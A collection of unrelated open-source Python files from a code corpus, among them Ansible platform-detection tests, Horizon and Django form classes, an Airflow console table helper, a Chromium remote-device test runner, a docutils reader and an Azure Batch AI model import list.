assert get_distribution() == "Amazon"
def test_distro_amazon_linux_long(self):
with patch('ansible.module_utils.distro.id', return_value="amazon"):
assert get_distribution() == "Amazon"
#
# get_distribution_version tests
#
def test_get_distribution_version_not_linux():
"""If it's not Linux, then it has no distribution"""
with patch('platform.system', return_value='Foo'):
assert get_distribution_version() is None
@pytest.mark.usefixtures("platform_linux")
def test_distro_found():
with patch('ansible.module_utils.distro.version', return_value="1"):
assert get_distribution_version() == "1"
#
# Tests for get_platform_subclass
#
class TestGetPlatformSubclass:
class LinuxTest:
pass
class Foo(LinuxTest):
platform = "Linux"
distribution = None
class Bar(LinuxTest):
platform = "Linux"
distribution = "Bar"
def test_not_linux(self):
# if neither match, the fallback should be the top-level class
with patch('platform.system', return_value="Foo"):
with patch('ansible.module_utils.common.sys_info.get_distribution', return_value=None):
assert get_platform_subclass(self.LinuxTest) is self.LinuxTest
@pytest.mark.usefixtures("platform_linux")
def test_get_distribution_none(self):
# match just the platform class, not a specific distribution
with patch('ansible.module_utils.common.sys_info.get_distribution', return_value=None):
assert get_platform_subclass(self.LinuxTest) is self.Foo
@pytest.mark.usefixtures("platform_linux")
def test_get_distribution_found(self):
# match both the distribution and platform class
with patch('ansible.module_utils.common.sys_info.get_distribution', return_value="Bar"):
assert get_platform_subclass(self.LinuxTest) is self.Bar
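
# A minimal, hypothetical sketch of how get_platform_subclass() is typically
# consumed outside these tests: a generic base class picks the most specific
# platform/distribution subclass at instantiation time. The class names below
# are illustrative assumptions, not real Ansible modules.
class ExampleService(object):
    platform = 'Generic'
    distribution = None

    def __new__(cls, *args, **kwargs):
        new_cls = get_platform_subclass(ExampleService)
        return super(cls, new_cls).__new__(new_cls)


class ExampleLinuxService(ExampleService):
    platform = 'Linux'
    distribution = None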
| gpl-3.0 |
yeming233/horizon | openstack_dashboard/dashboards/admin/volume_types/extras/forms.py | 3 | 2389 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from openstack_dashboard import api
from horizon import exceptions
from horizon import forms
from horizon import messages
class CreateExtraSpec(forms.SelfHandlingForm):
key = forms.CharField(max_length=255, label=_("Key"))
value = forms.CharField(max_length=255, label=_("Value"))
def handle(self, request, data):
type_id = self.initial['type_id']
try:
api.cinder.volume_type_extra_set(request,
type_id,
{data['key']: data['value']})
msg = _('Created extra spec "%s".') % data['key']
messages.success(request, msg)
return True
except Exception:
redirect = reverse("horizon:admin:volume_types:index")
exceptions.handle(request,
_("Unable to create volume type extra spec."),
redirect=redirect)
class EditExtraSpec(forms.SelfHandlingForm):
value = forms.CharField(max_length=255, label=_("Value"))
def handle(self, request, data):
key = self.initial['key']
type_id = self.initial['type_id']
try:
api.cinder.volume_type_extra_set(request,
type_id,
{key: data['value']})
msg = _('Saved extra spec "%s".') % key
messages.success(request, msg)
return True
except Exception:
redirect = reverse("horizon:admin:volume_types:index")
exceptions.handle(request,
_("Unable to edit volume type extra spec."),
redirect=redirect)
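
# An illustrative sketch of how a view could hand the volume type id to
# CreateExtraSpec through ``initial``, assuming horizon.forms exposes
# ModalFormView here; the view class name, template path and URL kwarg are
# assumptions, only the form usage mirrors handle() above.
class CreateExtraSpecView(forms.ModalFormView):
    form_class = CreateExtraSpec
    template_name = 'admin/volume_types/extras/create.html'

    def get_initial(self):
        return {'type_id': self.kwargs['type_id']}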
| apache-2.0 |
kevinr/750book-web | 750book-web-env/lib/python2.7/site-packages/django/contrib/comments/forms.py | 65 | 7896 | import time
import datetime
from django import forms
from django.forms.util import ErrorDict
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from models import Comment
from django.utils.encoding import force_unicode
from django.utils.hashcompat import sha_constructor
from django.utils.text import get_text_list
from django.utils.translation import ungettext, ugettext_lazy as _
COMMENT_MAX_LENGTH = getattr(settings,'COMMENT_MAX_LENGTH', 3000)
class CommentSecurityForm(forms.Form):
"""
Handles the security aspects (anti-spoofing) for comment forms.
"""
content_type = forms.CharField(widget=forms.HiddenInput)
object_pk = forms.CharField(widget=forms.HiddenInput)
timestamp = forms.IntegerField(widget=forms.HiddenInput)
security_hash = forms.CharField(min_length=40, max_length=40, widget=forms.HiddenInput)
def __init__(self, target_object, data=None, initial=None):
self.target_object = target_object
if initial is None:
initial = {}
initial.update(self.generate_security_data())
super(CommentSecurityForm, self).__init__(data=data, initial=initial)
def security_errors(self):
"""Return just those errors associated with security"""
errors = ErrorDict()
for f in ["honeypot", "timestamp", "security_hash"]:
if f in self.errors:
errors[f] = self.errors[f]
return errors
def clean_security_hash(self):
"""Check the security hash."""
security_hash_dict = {
'content_type' : self.data.get("content_type", ""),
'object_pk' : self.data.get("object_pk", ""),
'timestamp' : self.data.get("timestamp", ""),
}
expected_hash = self.generate_security_hash(**security_hash_dict)
actual_hash = self.cleaned_data["security_hash"]
if expected_hash != actual_hash:
raise forms.ValidationError("Security hash check failed.")
return actual_hash
def clean_timestamp(self):
"""Make sure the timestamp isn't too far (> 2 hours) in the past."""
ts = self.cleaned_data["timestamp"]
if time.time() - ts > (2 * 60 * 60):
raise forms.ValidationError("Timestamp check failed")
return ts
def generate_security_data(self):
"""Generate a dict of security data for "initial" data."""
timestamp = int(time.time())
security_dict = {
'content_type' : str(self.target_object._meta),
'object_pk' : str(self.target_object._get_pk_val()),
'timestamp' : str(timestamp),
'security_hash' : self.initial_security_hash(timestamp),
}
return security_dict
def initial_security_hash(self, timestamp):
"""
Generate the initial security hash from self.content_object
and a (unix) timestamp.
"""
initial_security_dict = {
'content_type' : str(self.target_object._meta),
'object_pk' : str(self.target_object._get_pk_val()),
'timestamp' : str(timestamp),
}
return self.generate_security_hash(**initial_security_dict)
def generate_security_hash(self, content_type, object_pk, timestamp):
"""Generate a (SHA1) security hash from the provided info."""
info = (content_type, object_pk, timestamp, settings.SECRET_KEY)
return sha_constructor("".join(info)).hexdigest()
class CommentDetailsForm(CommentSecurityForm):
"""
Handles the specific details of the comment (name, comment, etc.).
"""
name = forms.CharField(label=_("Name"), max_length=50)
email = forms.EmailField(label=_("Email address"))
url = forms.URLField(label=_("URL"), required=False)
comment = forms.CharField(label=_('Comment'), widget=forms.Textarea,
max_length=COMMENT_MAX_LENGTH)
def get_comment_object(self):
"""
Return a new (unsaved) comment object based on the information in this
form. Assumes that the form is already validated and will throw a
ValueError if not.
Does not set any of the fields that would come from a Request object
(i.e. ``user`` or ``ip_address``).
"""
if not self.is_valid():
raise ValueError("get_comment_object may only be called on valid forms")
CommentModel = self.get_comment_model()
new = CommentModel(**self.get_comment_create_data())
new = self.check_for_duplicate_comment(new)
return new
def get_comment_model(self):
"""
Get the comment model to create with this form. Subclasses in custom
comment apps should override this, get_comment_create_data, and perhaps
check_for_duplicate_comment to provide custom comment models.
"""
return Comment
def get_comment_create_data(self):
"""
Returns the dict of data to be used to create a comment. Subclasses in
custom comment apps that override get_comment_model can override this
method to add extra fields onto a custom comment model.
"""
return dict(
content_type = ContentType.objects.get_for_model(self.target_object),
object_pk = force_unicode(self.target_object._get_pk_val()),
user_name = self.cleaned_data["name"],
user_email = self.cleaned_data["email"],
user_url = self.cleaned_data["url"],
comment = self.cleaned_data["comment"],
submit_date = datetime.datetime.now(),
site_id = settings.SITE_ID,
is_public = True,
is_removed = False,
)
def check_for_duplicate_comment(self, new):
"""
Check that a submitted comment isn't a duplicate. This might be caused
by someone posting a comment twice. If it is a dup, silently return the *previous* comment.
"""
possible_duplicates = self.get_comment_model()._default_manager.using(
self.target_object._state.db
).filter(
content_type = new.content_type,
object_pk = new.object_pk,
user_name = new.user_name,
user_email = new.user_email,
user_url = new.user_url,
)
for old in possible_duplicates:
if old.submit_date.date() == new.submit_date.date() and old.comment == new.comment:
return old
return new
def clean_comment(self):
"""
If COMMENTS_ALLOW_PROFANITIES is False, check that the comment doesn't
contain anything in PROFANITIES_LIST.
"""
comment = self.cleaned_data["comment"]
if settings.COMMENTS_ALLOW_PROFANITIES == False:
bad_words = [w for w in settings.PROFANITIES_LIST if w in comment.lower()]
if bad_words:
plural = len(bad_words) > 1
raise forms.ValidationError(ungettext(
"Watch your mouth! The word %s is not allowed here.",
"Watch your mouth! The words %s are not allowed here.", plural) % \
get_text_list(['"%s%s%s"' % (i[0], '-'*(len(i)-2), i[-1]) for i in bad_words], 'and'))
return comment
class CommentForm(CommentDetailsForm):
honeypot = forms.CharField(required=False,
label=_('If you enter anything in this field '\
'your comment will be treated as spam'))
def clean_honeypot(self):
"""Check that nothing's been entered into the honeypot."""
value = self.cleaned_data["honeypot"]
if value:
raise forms.ValidationError(self.fields["honeypot"].label)
return value
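
# A minimal usage sketch, assuming ``entry`` is any saved model instance being
# commented on: the unbound form seeds the hidden anti-spoofing fields, and on
# submission the same target object plus the POST data are used to check them.
def example_comment_flow(entry, post_data=None):
    if post_data is None:
        return CommentForm(entry)              # unbound: seeds security fields
    bound = CommentForm(entry, data=post_data)
    if bound.security_errors():
        raise ValueError('tampered or expired comment form')
    if bound.is_valid():
        return bound.get_comment_object()      # unsaved Comment instance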
| mit |
mistercrunch/airflow | airflow/cli/simple_table.py | 5 | 4581 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import inspect
import json
from typing import Any, Callable, Dict, List, Optional, Union
import yaml
from rich.box import ASCII_DOUBLE_HEAD
from rich.console import Console
from rich.syntax import Syntax
from rich.table import Table
from airflow.plugins_manager import PluginsDirectorySource
class AirflowConsole(Console):
"""Airflow rich console"""
def print_as_json(self, data: Dict):
"""Renders dict as json text representation"""
json_content = json.dumps(data)
self.print(Syntax(json_content, "json", theme="ansi_dark"), soft_wrap=True)
def print_as_yaml(self, data: Dict):
"""Renders dict as yaml text representation"""
yaml_content = yaml.dump(data)
self.print(Syntax(yaml_content, "yaml", theme="ansi_dark"), soft_wrap=True)
def print_as_table(self, data: List[Dict]):
"""Renders list of dictionaries as table"""
if not data:
self.print("No data found")
return
table = SimpleTable(
show_header=True,
)
for col in data[0].keys():
table.add_column(col)
for row in data:
table.add_row(*[str(d) for d in row.values()])
self.print(table)
# pylint: disable=too-many-return-statements
def _normalize_data(self, value: Any, output: str) -> Optional[Union[list, str, dict]]:
if isinstance(value, (tuple, list)):
if output == "table":
return ",".join(self._normalize_data(x, output) for x in value)
return [self._normalize_data(x, output) for x in value]
if isinstance(value, dict) and output != "table":
return {k: self._normalize_data(v, output) for k, v in value.items()}
if inspect.isclass(value) and not isinstance(value, PluginsDirectorySource):
return value.__name__
if value is None:
return None
return str(value)
def print_as(self, data: List[Union[Dict, Any]], output: str, mapper: Optional[Callable] = None):
"""Prints provided using format specified by output argument"""
output_to_renderer = {
"json": self.print_as_json,
"yaml": self.print_as_yaml,
"table": self.print_as_table,
}
renderer = output_to_renderer.get(output)
if not renderer:
raise ValueError(
f"Unknown formatter: {output}. Allowed options: {list(output_to_renderer.keys())}"
)
if not all(isinstance(d, dict) for d in data) and not mapper:
raise ValueError("To tabulate non-dictionary data you need to provide `mapper` function")
if mapper:
dict_data: List[Dict] = [mapper(d) for d in data]
else:
dict_data: List[Dict] = data
dict_data = [{k: self._normalize_data(v, output) for k, v in d.items()} for d in dict_data]
renderer(dict_data)
class SimpleTable(Table):
"""A rich Table with some default hardcoded for consistency."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.show_edge = kwargs.get("show_edge", False)
self.pad_edge = kwargs.get("pad_edge", False)
self.box = kwargs.get("box", ASCII_DOUBLE_HEAD)
self.show_header = kwargs.get("show_header", False)
self.title_style = kwargs.get("title_style", "bold green")
self.title_justify = kwargs.get("title_justify", "left")
self.caption = kwargs.get("caption", " ")
def add_column(self, *args, **kwargs) -> None: # pylint: disable=signature-differs
"""Add a column to the table. We use different default"""
kwargs["overflow"] = kwargs.get("overflow", None) # to avoid truncating
super().add_column(*args, **kwargs)
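
# A small usage sketch based only on the API defined above: ``print_as`` takes
# a list of dicts (or arbitrary objects plus a ``mapper``) and renders them as
# json, yaml or an ASCII table; the sample rows are illustrative.
if __name__ == "__main__":
    console = AirflowConsole()
    rows = [
        {"dag_id": "example_dag", "is_paused": False, "tags": ["demo"]},
        {"dag_id": "other_dag", "is_paused": True, "tags": []},
    ]
    console.print_as(data=rows, output="table")
    console.print_as(data=rows, output="json")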
| apache-2.0 |
vadimtk/chrome4sdp | build/android/pylib/remote/device/remote_device_test_run.py | 2 | 15140 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Run specific test on specific environment."""
import json
import logging
import os
import re
import shutil
import string
import tempfile
import time
import zipfile
from pylib.base import base_test_result
from pylib.base import test_run
from pylib.remote.device import appurify_constants
from pylib.remote.device import appurify_sanitized
from pylib.remote.device import remote_device_helper
from pylib.utils import zip_utils
_DEVICE_OFFLINE_RE = re.compile('error: device not found')
_LONG_MSG_RE = re.compile('longMsg=')
_SHORT_MSG_RE = re.compile('shortMsg=')
class RemoteDeviceTestRun(test_run.TestRun):
"""Run tests on a remote device."""
_TEST_RUN_KEY = 'test_run'
_TEST_RUN_ID_KEY = 'test_run_id'
WAIT_TIME = 5
COMPLETE = 'complete'
HEARTBEAT_INTERVAL = 300
def __init__(self, env, test_instance):
"""Constructor.
Args:
env: Environment the tests will run in.
test_instance: The test that will be run.
"""
super(RemoteDeviceTestRun, self).__init__(env, test_instance)
self._env = env
self._test_instance = test_instance
self._app_id = ''
self._test_id = ''
self._results = ''
self._test_run_id = ''
self._results_temp_dir = None
#override
def SetUp(self):
"""Set up a test run."""
if self._env.trigger:
self._TriggerSetUp()
elif self._env.collect:
assert isinstance(self._env.collect, basestring), (
'File for storing test_run_id must be a string.')
with open(self._env.collect, 'r') as persisted_data_file:
persisted_data = json.loads(persisted_data_file.read())
self._env.LoadFrom(persisted_data)
self.LoadFrom(persisted_data)
def _TriggerSetUp(self):
"""Set up the triggering of a test run."""
raise NotImplementedError
#override
def RunTests(self):
"""Run the test."""
if self._env.trigger:
with appurify_sanitized.SanitizeLogging(self._env.verbose_count,
logging.WARNING):
test_start_res = appurify_sanitized.api.tests_run(
self._env.token, self._env.device_type_id, self._app_id,
self._test_id)
remote_device_helper.TestHttpResponse(
test_start_res, 'Unable to run test.')
self._test_run_id = test_start_res.json()['response']['test_run_id']
logging.info('Test run id: %s' % self._test_run_id)
if self._env.collect:
current_status = ''
timeout_counter = 0
heartbeat_counter = 0
while self._GetTestStatus(self._test_run_id) != self.COMPLETE:
if self._results['detailed_status'] != current_status:
logging.info('Test status: %s', self._results['detailed_status'])
current_status = self._results['detailed_status']
timeout_counter = 0
heartbeat_counter = 0
if heartbeat_counter > self.HEARTBEAT_INTERVAL:
logging.info('Test status: %s', self._results['detailed_status'])
heartbeat_counter = 0
timeout = self._env.timeouts.get(
current_status, self._env.timeouts['unknown'])
if timeout_counter > timeout:
raise remote_device_helper.RemoteDeviceError(
'Timeout while in %s state for %s seconds'
% (current_status, timeout),
is_infra_error=True)
time.sleep(self.WAIT_TIME)
timeout_counter += self.WAIT_TIME
heartbeat_counter += self.WAIT_TIME
self._DownloadTestResults(self._env.results_path)
if self._results['results']['exception']:
raise remote_device_helper.RemoteDeviceError(
self._results['results']['exception'], is_infra_error=True)
return self._ParseTestResults()
#override
def TearDown(self):
"""Tear down the test run."""
if self._env.collect:
self._CollectTearDown()
elif self._env.trigger:
assert isinstance(self._env.trigger, basestring), (
'File for storing test_run_id must be a string.')
with open(self._env.trigger, 'w') as persisted_data_file:
persisted_data = {}
self.DumpTo(persisted_data)
self._env.DumpTo(persisted_data)
persisted_data_file.write(json.dumps(persisted_data))
def _CollectTearDown(self):
if self._GetTestStatus(self._test_run_id) != self.COMPLETE:
with appurify_sanitized.SanitizeLogging(self._env.verbose_count,
logging.WARNING):
test_abort_res = appurify_sanitized.api.tests_abort(
self._env.token, self._test_run_id, reason='Test runner exiting.')
remote_device_helper.TestHttpResponse(test_abort_res,
'Unable to abort test.')
if self._results_temp_dir:
shutil.rmtree(self._results_temp_dir)
def __enter__(self):
"""Set up the test run when used as a context manager."""
self.SetUp()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""Tear down the test run when used as a context manager."""
self.TearDown()
def DumpTo(self, persisted_data):
test_run_data = {
self._TEST_RUN_ID_KEY: self._test_run_id,
}
persisted_data[self._TEST_RUN_KEY] = test_run_data
def LoadFrom(self, persisted_data):
test_run_data = persisted_data[self._TEST_RUN_KEY]
self._test_run_id = test_run_data[self._TEST_RUN_ID_KEY]
def _ParseTestResults(self):
raise NotImplementedError
def _GetTestByName(self, test_name):
"""Gets test_id for specific test.
Args:
test_name: Test to find the ID of.
"""
with appurify_sanitized.SanitizeLogging(self._env.verbose_count,
logging.WARNING):
test_list_res = appurify_sanitized.api.tests_list(self._env.token)
remote_device_helper.TestHttpResponse(test_list_res,
'Unable to get tests list.')
for test in test_list_res.json()['response']:
if test['test_type'] == test_name:
return test['test_id']
raise remote_device_helper.RemoteDeviceError(
'No test found with name %s' % (test_name))
def _DownloadTestResults(self, results_path):
"""Download the test results from remote device service.
    Downloads results to a temporary location, and then copies them
    to results_path if results_path is not None.
Args:
results_path: Path to download appurify results zipfile.
Returns:
Path to downloaded file.
"""
if self._results_temp_dir is None:
self._results_temp_dir = tempfile.mkdtemp()
logging.info('Downloading results to %s.' % self._results_temp_dir)
with appurify_sanitized.SanitizeLogging(self._env.verbose_count,
logging.WARNING):
appurify_sanitized.utils.wget(self._results['results']['url'],
self._results_temp_dir + '/results')
if results_path:
logging.info('Copying results to %s', results_path)
if not os.path.exists(os.path.dirname(results_path)):
os.makedirs(os.path.dirname(results_path))
shutil.copy(self._results_temp_dir + '/results', results_path)
return self._results_temp_dir + '/results'
def _GetTestStatus(self, test_run_id):
"""Checks the state of the test, and sets self._results
Args:
      test_run_id: Id of the test on the remote service.
"""
with appurify_sanitized.SanitizeLogging(self._env.verbose_count,
logging.WARNING):
test_check_res = appurify_sanitized.api.tests_check_result(
self._env.token, test_run_id)
remote_device_helper.TestHttpResponse(test_check_res,
'Unable to get test status.')
self._results = test_check_res.json()['response']
return self._results['status']
def _AmInstrumentTestSetup(self, app_path, test_path, runner_package,
environment_variables, extra_apks=None):
config = {'runner': runner_package}
if environment_variables:
config['environment_vars'] = ','.join(
'%s=%s' % (k, v) for k, v in environment_variables.iteritems())
self._app_id = self._UploadAppToDevice(app_path)
data_deps = self._test_instance.GetDataDependencies()
if data_deps:
with tempfile.NamedTemporaryFile(suffix='.zip') as test_with_deps:
sdcard_files = []
additional_apks = []
host_test = os.path.basename(test_path)
with zipfile.ZipFile(test_with_deps.name, 'w') as zip_file:
zip_file.write(test_path, host_test, zipfile.ZIP_DEFLATED)
for h, _ in data_deps:
if os.path.isdir(h):
zip_utils.WriteToZipFile(zip_file, h, '.')
sdcard_files.extend(os.listdir(h))
else:
zip_utils.WriteToZipFile(zip_file, h, os.path.basename(h))
sdcard_files.append(os.path.basename(h))
for a in extra_apks or ():
            zip_utils.WriteToZipFile(zip_file, a, os.path.basename(a))
additional_apks.append(os.path.basename(a))
config['sdcard_files'] = ','.join(sdcard_files)
config['host_test'] = host_test
if additional_apks:
config['additional_apks'] = ','.join(additional_apks)
self._test_id = self._UploadTestToDevice(
'robotium', test_with_deps.name, app_id=self._app_id)
else:
self._test_id = self._UploadTestToDevice('robotium', test_path)
logging.info('Setting config: %s' % config)
appurify_configs = {}
if self._env.network_config:
appurify_configs['network'] = self._env.network_config
self._SetTestConfig('robotium', config, **appurify_configs)
def _UploadAppToDevice(self, app_path):
"""Upload app to device."""
logging.info('Uploading %s to remote service as %s.', app_path,
self._test_instance.suite)
with open(app_path, 'rb') as apk_src:
with appurify_sanitized.SanitizeLogging(self._env.verbose_count,
logging.WARNING):
upload_results = appurify_sanitized.api.apps_upload(
self._env.token, apk_src, 'raw', name=self._test_instance.suite)
remote_device_helper.TestHttpResponse(
upload_results, 'Unable to upload %s.' % app_path)
return upload_results.json()['response']['app_id']
def _UploadTestToDevice(self, test_type, test_path, app_id=None):
"""Upload test to device
Args:
      test_type: Type of test that is being uploaded, e.g. uirobot, gtest.
"""
logging.info('Uploading %s to remote service.' % test_path)
with open(test_path, 'rb') as test_src:
with appurify_sanitized.SanitizeLogging(self._env.verbose_count,
logging.WARNING):
upload_results = appurify_sanitized.api.tests_upload(
self._env.token, test_src, 'raw', test_type, app_id=app_id)
remote_device_helper.TestHttpResponse(upload_results,
'Unable to upload %s.' % test_path)
return upload_results.json()['response']['test_id']
def _SetTestConfig(self, runner_type, runner_configs,
network=appurify_constants.NETWORK.WIFI_1_BAR,
pcap=0, profiler=0, videocapture=0):
"""Generates and uploads config file for test.
Args:
runner_configs: Configs specific to the runner you are using.
network: Config to specify the network environment the devices running
the tests will be in.
      pcap: Option to enable recording of network traffic from the device.
profiler: Option to set the recording of CPU, memory, and network
transfer usage in the tests.
videocapture: Option to set video capture during the tests.
"""
logging.info('Generating config file for test.')
with tempfile.TemporaryFile() as config:
config_data = [
'[appurify]',
'network=%s' % network,
'pcap=%s' % pcap,
'profiler=%s' % profiler,
'videocapture=%s' % videocapture,
'[%s]' % runner_type
]
config_data.extend(
'%s=%s' % (k, v) for k, v in runner_configs.iteritems())
config.write(''.join('%s\n' % l for l in config_data))
config.flush()
config.seek(0)
with appurify_sanitized.SanitizeLogging(self._env.verbose_count,
logging.WARNING):
config_response = appurify_sanitized.api.config_upload(
self._env.token, config, self._test_id)
remote_device_helper.TestHttpResponse(
config_response, 'Unable to upload test config.')
def _LogLogcat(self, level=logging.CRITICAL):
"""Prints out logcat downloaded from remote service.
Args:
level: logging level to print at.
Raises:
KeyError: If appurify_results/logcat.txt file cannot be found in
downloaded zip.
"""
zip_file = self._DownloadTestResults(None)
with zipfile.ZipFile(zip_file) as z:
try:
logcat = z.read('appurify_results/logcat.txt')
printable_logcat = ''.join(c for c in logcat if c in string.printable)
for line in printable_logcat.splitlines():
logging.log(level, line)
except KeyError:
logging.error('No logcat found.')
def _LogAdbTraceLog(self):
zip_file = self._DownloadTestResults(None)
with zipfile.ZipFile(zip_file) as z:
adb_trace_log = z.read('adb_trace.log')
for line in adb_trace_log.splitlines():
logging.critical(line)
def _DidDeviceGoOffline(self):
zip_file = self._DownloadTestResults(None)
with zipfile.ZipFile(zip_file) as z:
adb_trace_log = z.read('adb_trace.log')
if any(_DEVICE_OFFLINE_RE.search(l) for l in adb_trace_log.splitlines()):
return True
return False
def _DetectPlatformErrors(self, results):
if not self._results['results']['pass']:
if any(_SHORT_MSG_RE.search(l)
for l in self._results['results']['output'].splitlines()):
self._LogLogcat()
for line in self._results['results']['output'].splitlines():
if _LONG_MSG_RE.search(line):
results.AddResult(base_test_result.BaseTestResult(
line.split('=')[1], base_test_result.ResultType.CRASH))
break
else:
results.AddResult(base_test_result.BaseTestResult(
'Unknown platform error detected.',
base_test_result.ResultType.UNKNOWN))
elif self._DidDeviceGoOffline():
self._LogLogcat()
self._LogAdbTraceLog()
raise remote_device_helper.RemoteDeviceError(
'Remote service unable to reach device.', is_infra_error=True)
else:
results.AddResult(base_test_result.BaseTestResult(
'Remote Service detected error.',
base_test_result.ResultType.UNKNOWN))
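
# An illustrative driver sketch: a concrete subclass must implement
# _TriggerSetUp() and _ParseTestResults(), after which a runner can drive it
# through the context-manager protocol defined above. ``run_cls``, ``env`` and
# ``test_instance`` are assumed to come from the surrounding test framework.
def _example_drive(run_cls, env, test_instance):
  with run_cls(env, test_instance) as test_run:
    return test_run.RunTests()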
| bsd-3-clause |
ojengwa/oh-mainline | vendor/packages/docutils/docutils/readers/standalone.py | 197 | 2340 | # $Id: standalone.py 4802 2006-11-12 18:02:17Z goodger $
# Author: David Goodger <[email protected]>
# Copyright: This module has been placed in the public domain.
"""
Standalone file Reader for the reStructuredText markup syntax.
"""
__docformat__ = 'reStructuredText'
import sys
from docutils import frontend, readers
from docutils.transforms import frontmatter, references, misc
class Reader(readers.Reader):
supported = ('standalone',)
"""Contexts this reader supports."""
document = None
"""A single document tree."""
settings_spec = (
'Standalone Reader',
None,
(('Disable the promotion of a lone top-level section title to '
'document title (and subsequent section title to document '
'subtitle promotion; enabled by default).',
['--no-doc-title'],
{'dest': 'doctitle_xform', 'action': 'store_false', 'default': 1,
'validator': frontend.validate_boolean}),
('Disable the bibliographic field list transform (enabled by '
'default).',
['--no-doc-info'],
{'dest': 'docinfo_xform', 'action': 'store_false', 'default': 1,
'validator': frontend.validate_boolean}),
('Activate the promotion of lone subsection titles to '
'section subtitles (disabled by default).',
['--section-subtitles'],
{'dest': 'sectsubtitle_xform', 'action': 'store_true', 'default': 0,
'validator': frontend.validate_boolean}),
('Deactivate the promotion of lone subsection titles.',
['--no-section-subtitles'],
{'dest': 'sectsubtitle_xform', 'action': 'store_false'}),
))
config_section = 'standalone reader'
config_section_dependencies = ('readers',)
def get_transforms(self):
return readers.Reader.get_transforms(self) + [
references.Substitutions,
references.PropagateTargets,
frontmatter.DocTitle,
frontmatter.SectionSubTitle,
frontmatter.DocInfo,
references.AnonymousHyperlinks,
references.IndirectHyperlinks,
references.Footnotes,
references.ExternalTargets,
references.InternalTargets,
references.DanglingReferences,
misc.Transitions,
]
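
# A short usage sketch: the standalone reader is the default reader for the
# docutils front ends, so it can be exercised through docutils.core directly;
# the sample source text is arbitrary.
if __name__ == '__main__':
    from docutils.core import publish_string
    output = publish_string(source='Title\n=====\n\nSome *emphasized* text.\n',
                            reader_name='standalone',
                            writer_name='html')
    print(output[:80])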
| agpl-3.0 |
Azure/azure-sdk-for-python | sdk/batchai/azure-mgmt-batchai/azure/mgmt/batchai/models/__init__.py | 1 | 11819 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
try:
from ._models_py3 import AppInsightsReference
from ._models_py3 import AutoScaleSettings
from ._models_py3 import AzureBlobFileSystemReference
from ._models_py3 import AzureFileShareReference
from ._models_py3 import AzureStorageCredentialsInfo
from ._models_py3 import BatchAIError
from ._models_py3 import CNTKsettings
from ._models_py3 import Caffe2Settings
from ._models_py3 import CaffeSettings
from ._models_py3 import ChainerSettings
from ._models_py3 import CloudErrorBody
from ._models_py3 import Cluster
from ._models_py3 import ClusterCreateParameters
from ._models_py3 import ClusterListResult
from ._models_py3 import ClusterUpdateParameters
from ._models_py3 import ClustersListByWorkspaceOptions
from ._models_py3 import ContainerSettings
from ._models_py3 import CustomMpiSettings
from ._models_py3 import CustomToolkitSettings
from ._models_py3 import DataDisks
from ._models_py3 import EnvironmentVariable
from ._models_py3 import EnvironmentVariableWithSecretValue
from ._models_py3 import Experiment
from ._models_py3 import ExperimentListResult
from ._models_py3 import ExperimentsListByWorkspaceOptions
from ._models_py3 import File
from ._models_py3 import FileListResult
from ._models_py3 import FileServer
from ._models_py3 import FileServerCreateParameters
from ._models_py3 import FileServerListResult
from ._models_py3 import FileServerReference
from ._models_py3 import FileServersListByWorkspaceOptions
from ._models_py3 import HorovodSettings
from ._models_py3 import ImageReference
from ._models_py3 import ImageSourceRegistry
from ._models_py3 import InputDirectory
from ._models_py3 import Job
from ._models_py3 import JobBasePropertiesConstraints
from ._models_py3 import JobCreateParameters
from ._models_py3 import JobListResult
from ._models_py3 import JobPreparation
from ._models_py3 import JobPropertiesConstraints
from ._models_py3 import JobPropertiesExecutionInfo
from ._models_py3 import JobsListByExperimentOptions
from ._models_py3 import JobsListOutputFilesOptions
from ._models_py3 import KeyVaultSecretReference
from ._models_py3 import ListUsagesResult
from ._models_py3 import ManualScaleSettings
from ._models_py3 import MountSettings
from ._models_py3 import MountVolumes
from ._models_py3 import NameValuePair
from ._models_py3 import NodeSetup
from ._models_py3 import NodeStateCounts
from ._models_py3 import Operation
from ._models_py3 import OperationDisplay
from ._models_py3 import OperationListResult
from ._models_py3 import OutputDirectory
from ._models_py3 import PerformanceCountersSettings
from ._models_py3 import PrivateRegistryCredentials
from ._models_py3 import ProxyResource
from ._models_py3 import PyTorchSettings
from ._models_py3 import RemoteLoginInformation
from ._models_py3 import RemoteLoginInformationListResult
from ._models_py3 import Resource
from ._models_py3 import ResourceId
from ._models_py3 import ScaleSettings
from ._models_py3 import SetupTask
from ._models_py3 import SshConfiguration
from ._models_py3 import TensorFlowSettings
from ._models_py3 import UnmanagedFileSystemReference
from ._models_py3 import Usage
from ._models_py3 import UsageName
from ._models_py3 import UserAccountSettings
from ._models_py3 import VirtualMachineConfiguration
from ._models_py3 import Workspace
from ._models_py3 import WorkspaceCreateParameters
from ._models_py3 import WorkspaceListResult
from ._models_py3 import WorkspaceUpdateParameters
from ._models_py3 import WorkspacesListByResourceGroupOptions
from ._models_py3 import WorkspacesListOptions
except (SyntaxError, ImportError):
from ._models import AppInsightsReference # type: ignore
from ._models import AutoScaleSettings # type: ignore
from ._models import AzureBlobFileSystemReference # type: ignore
